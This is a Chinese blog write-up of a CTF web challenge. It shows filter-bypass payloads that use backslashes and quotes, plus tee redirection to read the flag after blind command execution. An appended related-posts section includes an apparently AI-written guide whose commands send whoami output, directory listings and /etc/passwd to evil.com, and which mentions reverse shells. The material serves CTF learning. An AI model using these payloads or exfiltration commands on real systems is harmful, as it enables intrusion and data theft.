[SWPUCTF 2021 新生赛]finalrce(管道符(|)+tee绕过exec无回显 反斜杠或者单(双)引号绕过正则表达式)

最新推荐文章于 2025-03-30 20:34:43 发布
最新推荐文章于 2025-03-30 20:34:43 发布
阅读量613 收藏 8
点赞数 10
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84499442/article/details/140306083
版权

 首先看源码

第一点,我们需要绕过正则表达式

第二点,由于exec不返回命令执行结果,所以要进行输出重定向

由于正则表达式过滤掉了很多命令,但是注意看,反斜杠和单引号都没有被注释掉,那么我们就可以利用这一点来绕过被禁止掉的命令

构造payload:url=l\s /|tee 1.txt;

                        url=l's' /|tee 2.txt;

                      

第二种payload

这里需要说明一下

所以这里的|tee就是将ls出的内容重定向到txt文本中

得到敏感文件,再进行内容读取,由于cat和la同样被禁用,还是相同的方法

构造payload

?url=ca\t%20/flllll\aaaaaaggggggg|tee%201.txt;

?url=c\at%20/flllll\aaaaaaggggggg|tee%203.txt;

?url=c'a't%20/flllll'a'aaaaaggggggg|tee%204.txt;

随便选择一种都可以

总结:当正则表达式没有过滤掉反斜杠或者单引号或者双引号(本题双引号被过滤,不再演示),那么可以使用单引号或者双引号包裹命令(ls cat等)任意一个字符,只要他们不是一个整体就行,或者使用反斜杠插入到命令里面(ca\t  c\at等)即可实现绕过。

【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 3180
4、passthru():能将字串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字串作为OS命令执行,且返回命令执行结果;
运维知识点-Windows操作系统-cmd/Dos批处理bat命令与脚本手册
aming小老弟
11-17 2267
注释输入和输出变量条件判断循环跳转函数DOS命令CurlTelnet添加账号并加入管理员组添加用户至远程桌面组允许修改密码关闭防火墙获取系统和版本信息显示本地或远程机器上当前运行的进程列表。操作系统 服务命令列表chkdsk.exe 磁盘检查开3389端口systeminfo获取NETBIOS主机名ping 测试网络连接net computer 添加或者删除域数据库中的计算机,telnet命令进行远程登陆使用ftp命令进行数据传输使用netstat命令查看网络连接的相关信息。
SWPUCTF 2021 新生 RCE题目
m0_74160536的博客
05-26 856
查看代码,这段 PHP 代码接受一个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含一些危险的命令和特殊号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、
[SWPUCTF 2021 新生]finalrce
qq_73767109的博客
06-11 740
exec函数是一个PHP内置的外部命令执行程序。它可以在服务器上执行任何可执行文件或命令,并在执行过程中返回输出。tee命令的功能是用于读取标准输入的数据,将其内容转交到标准输出设备中,同时保存成文件。利用这个命令让执行后的内容存到一个文件下然后去访问这个文件,从而实现间接的命令执行。这里很明显是waf绕过命令执行,但是在尝试执行命令后没有回显并出现。这里要注意格式,ls后一定要加/ 不然返回的是刚刚存入的文件。先是一个正则匹配,再到一个exec执行命令的函数。这里用一个linux的一个命令。
SWPUCTF 2021 新生finalrce
XiaoHei的博客
03-30 174
Linux tee命令用于读取标准输入的数据,并将其内容输出成文件。通过测试,为无回显RCE,访问3.txt得到flag。
[SWPUCTF 2021 新生]finalrce wp
Leaf_initial的博客
04-12 764
PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit默认1000000,超过1000000不会返回1或0而是false即超过限制即可。
Linux的命令使用格式,以及常用命令总结(持续更新中)
weixin_43570812的博客
02-23 749
Linux的命令使用格式 COMMEND [OPTIONS] [ARGUMENTS...] COMMEND:表示需要执行的命令 OPTIONS:表示选项,用来调整命令执行的特性 ARGUMENTS:表示参数,是指命令作用的对象,多个参数时用空白字隔开 []:中括号表示可选项,也就是有些命令可以不带选项和参数 …:表示可多个共存 ...
Linux常用命令分类总结
兰海泽的博客
09-06 3889
1.1 ls 语法: ls [-RadCxmlnogrtucpFbqisf1] [目录或文件……] 说明: ls 命令列出指定目录下的文件,缺省目录为当前目录 ./,缺省输出顺序为纵向按字顺序排列。 -R 递归地列出每个子目录的内容 -a 列出所有文件,包括第一个字为“.”的隐藏文件 -d 若后面参数是目录,则只列出目录名而不列出目录内容,常与-l选项连 用以显示目录状...
PHP 面试知识点整理归纳
热门推荐
PHP学习日志——地雷
09-05 1万+
全文已整理补充完毕,以后还会继续更新文章里面的错误,以及补充尚不完善的问题。 该篇文章是针对Github上wudi/PHP-Interview-Best-Practices-in-China资源的答案个人整理 lz也是初学者,以下知识点均为自己整理且保持不断更新,也希望各路大神多多指点,若发现错误或有补充,可直接comment,lz时刻关注着。 由于内容比较多,没有直接目录,请自行对照 Gi...
[SWPUCTF 2021 新生]finalrce(tee)
kuzemax的博客
05-29 291
可以看到的是没有过滤|这个号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。url=l\s / | tee 1.txt 之后访问我们传入的文件1.txt,发现命令被执行。本来应该是url=ls/ 可是ls被过滤掉了,然后看别的up主说,l\s可以代替ls |是执行以下命令的意思。
NSSCTF刷题笔记web15——[SWPUCTF 2021 新生]finalrce
qq_45692883的博客
01-26 350
然后通过管道传入到一个txt文件,我们再浏览器访问对应txt文件就可以看到数据了,因为exec在php中是无回显的执行命令函数。难道还可以用''绕过吗,如果可以,那不就有点扯了,因为如果真的有一个叫flllll''aaaaaaggggggg的文件那怎么办?那么后面的参数,要读的文件flllllaaaaaaggggggg,被过滤了la。如果真的有个叫flllll''aaaaaaggggggg怎么办,在本地试试看吧。于是就去看了看别人的wp,发现大家在ls中间加入''变成l''s可以执行命令。
[SWPUCTF 2021 新生]finalrce 做题记录
qq_64222098的博客
04-10 295
由于函数exec()执行完不返回结果,所以我们可以借助tee把命令写到文件里面去。通过访问文件来得到结果。虽然ls被禁了,但是我们可以用转义或者引号绕过。最终是在flllllaaaaaaggggggg里面找到的flag。在linux里有一个tee命令。这里贴一下菜鸟教程的解释。一般用的命令都被禁了。然后访问2.txt就可以了。然后去访问1.txt。
rce无回显绕过
最新发布
04-03
<think>好的,用户需要了解RCE无回显情况下的绕过技巧和实现方式。首先,我得回忆一下常见的无回显RCE利用方法。通常,当命令执行没有直接输出时,可以通过外带数据或者利用其他协议进行检测。 第一步,可能需要提到DNS外带。比如使用curl或nslookup将数据通过DNS查询发送到攻击者控制的服务器。这种方法常用于检测是否存在漏洞,因为很多环境允许DNS流量[^1]。 接下来,考虑HTTP请求外带。即使命令执行没有回显,也可以通过wget或curl触发HTTP请求到攻击者的服务器,从而确认漏洞存在。例如,执行命令访问特定URL,然后在服务器日志查看请求记录[^2]。 然后是时间延迟技术。通过执行sleep等命令,观察响应时间的变化来判断命令是否执行。比如,注入sleep 5,如果响应延迟了5秒,说明可能成功执行。 另外,还可以利用写入文件再读取的方法。比如将命令结果输出到web目录下的文件,然后通过访问该文件获取结果。不过这种方法需要web服务器有写权限,并且知道文件路径。 还有可能需要考虑其他协议如ICMP或者SMTP来外传数据。比如使用ping命令携带数据,但这种方法传输的数据量有限,且可能被防火墙拦截。 用户可能需要具体的实现示例,比如如何构造DNS外带的payload,或者如何利用Burp Collaborator进行检测。需要确保提到的技巧都有实际应用场景,并且引用相关资源。 最后,生成相关问题时要覆盖检测方法、工具使用、协议利用和防御措施等方面,帮助用户全面了解。</think>### RCE无回显绕过技巧及实现方式 在远程代码执行(RCE)漏洞利用中,无回显场景需要通过间接方式确认命令执行结果,主要技术手段包括: #### 一、外带数据检测法 1. **DNS外带** 通过构造DNS查询请求将数据发送至攻击者控制的DNS服务器: ```bash curl http://evil.com/$(whoami).example.com nslookup $(id | base64).evil.com ``` 使用Burp Collaborator或Interactsh工具可自动捕获DNS查询记录[^3]。 2. **HTTP请求外带** 利用wget/curl触发HTTP请求: ```bash wget http://evil.com/?data=$(ls / | base64) ``` 通过HTTP请求头、URL参数或POST请求体传递数据,可使用OOB-Server实时接收数据。 #### 二、间接验证法 1. **时间盲注** 通过响应延迟判断命令执行结果: ```bash ping -c 5 127.0.0.1 && sleep 10 # 存在条件判断时使用 ``` 若目标系统支持管道,可构造: ```bash cat /etc/passwd | base64 | curl -X POST --data-binary @- http://evil.com ``` 2. **文件写入+访问** 将执行结果写入Web目录: ```bash id > /var/www/html/result.txt ``` 通过浏览器访问`http://target.com/result.txt`读取结果(需已知Web路径和写权限)。 #### 三、特殊协议利用 1. **ICMP外带数据** 使用ping命令携带Base64编码数据(需自定义编码脚本): ```bash ping -p $(echo 'data' | xxd -p) evil.com ``` 2. **SMTP邮件发送** 通过mailutils发送命令结果: ```bash echo "结果" | mail -s "RCE数据" attacker@evil.com ``` #### 四、工具化实现 - **Curl加密传输** ```bash curl --data "$(ls -al | openssl aes-256-cbc -pass pass:key)" https://evil.com ``` - **Metasploit模块** 使用`exploit/multi/handler`配合`cmd/unix/reverse_bash`实现反向Shell[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值